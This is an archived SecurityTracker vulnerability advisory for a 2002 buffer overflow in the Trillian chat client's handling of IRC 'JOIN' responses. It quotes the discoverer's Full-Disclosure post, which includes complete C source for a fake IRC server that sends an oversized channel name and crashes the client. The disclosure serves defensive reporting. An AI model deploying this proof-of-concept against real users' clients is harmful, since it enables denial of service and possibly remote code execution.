SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Instant Messaging/IRC/Chat)  >   Trillian Vendors:   Cerulean Studios
Trillian Chat Client Buffer Overflow in Processing 'JOIN' Command Allows Remote Code Execution
SecurityTracker Alert ID:  1005264
SecurityTracker URL:  http://securitytracker.com/id/1005264
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 21 2002
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): .74
Description:   Another buffer overflow was reported in the Trillian instant messaging client. A remote user with an IRC server may be able to execute arbitrary code on the target user's system.

It is reported that if Trillian joins a channel with a name larger than 206 bytes, a buffer overflow will be triggered.

A remote user with an IRC server could respond to a Trillian client's JOIN command with a specially crafted response to cause the client to crash or to execute arbitrary code.

Some demonstration exploit code (to trigger a denial of service condition) is included in the Source Message.
Impact:   A remote IRC server can cause the Trillian client to crash or execute arbitrary code in response to a JOIN command.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ceruleanstudios.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Fri, 20 Sep 2002 17:21:06 +0000
Subject:  [Full-Disclosure] Yet Another. Trillian 'JOIN' Overflow.


Discovered:
-----------
02 September 2002 By Me, Lance Fitz-Herbert (aka phrizer).


Vulnerable Applications:
------------------------
Tested On Trillian .73 and .74, But im guessing older versions are also 
vulnerable, and possibly version 1.0 Pro.


Impact:
-------
Low-High. This could possibly allow arbitary code to be executed on the 
remote victims machine, or used as a DoS.


Details:
--------
Trillian is a popular Instant Messageing client, which supports 
icq/aim/yahoo/msn and IRC.
An overflow exists in the way Trillian procceses 'JOIN' commands from the 
irc server. If Trillian joins a channel that is larger than 206 bytes, 
trillian will crash and overwrite registers.

To exploit this, the victim needs to be connected to the attackers 'IRC 
Server'


Solution:
---------
Dont go on untrusted IRC Server :P


Exploit Code:
-------------
Prove of flaw, DoS Code:

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

	SOCKET TempSock = SOCKET_ERROR;
	WSADATA WsaDat;
	SOCKADDR_IN Sockaddr;
	int nRet;
	char payload[300];

	printf("\nTrillian Join Flaw\n");
	printf("----------------------\n");
	printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
	printf("Tested On Version .74 and .73\nListening On Port 6667 For 
Connections\n\n");

	if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        	printf("ERROR: WSA Initialization failed.");
		return 0;
	}


	/* Create Socket */
	s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s == INVALID_SOCKET) {
		printf("ERROR: Could Not Create Socket. Exiting\n");
		WSACleanup();
		return 0;
	}

	Sockaddr.sin_port = htons(6667);
	Sockaddr.sin_family = AF_INET;
	Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
	if (nRet == SOCKET_ERROR) {
		printf("ERROR Binding Socket");
		WSACleanup();
		return 0;
	}

	/* Make Socket Listen */
	if (listen(s, 10) == SOCKET_ERROR) {
		printf("ERROR: Couldnt Make Listening Socket\n");
		WSACleanup();
		return 0;
	}

	while (TempSock == SOCKET_ERROR) {
	      TempSock = accept(s, NULL, NULL);
	}

	printf("Client Connected, Sending Payload\n");

	send(TempSock,MSG1,strlen(MSG1),0);
	memset(payload,'A',300);
	send(TempSock,payload,strlen(payload),0);
	send(TempSock,"\n",1,0);

	printf("Exiting\n");
	sleep(100);
	WSACleanup();
	return 0;
}


--end code--

----
NOTE: Because of the amount of spam i receive, i require all emails directed 
*to me* to contain the word "nospam" in the subject line somewhere. Else i 
might not get your email. thankyou.
----












_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC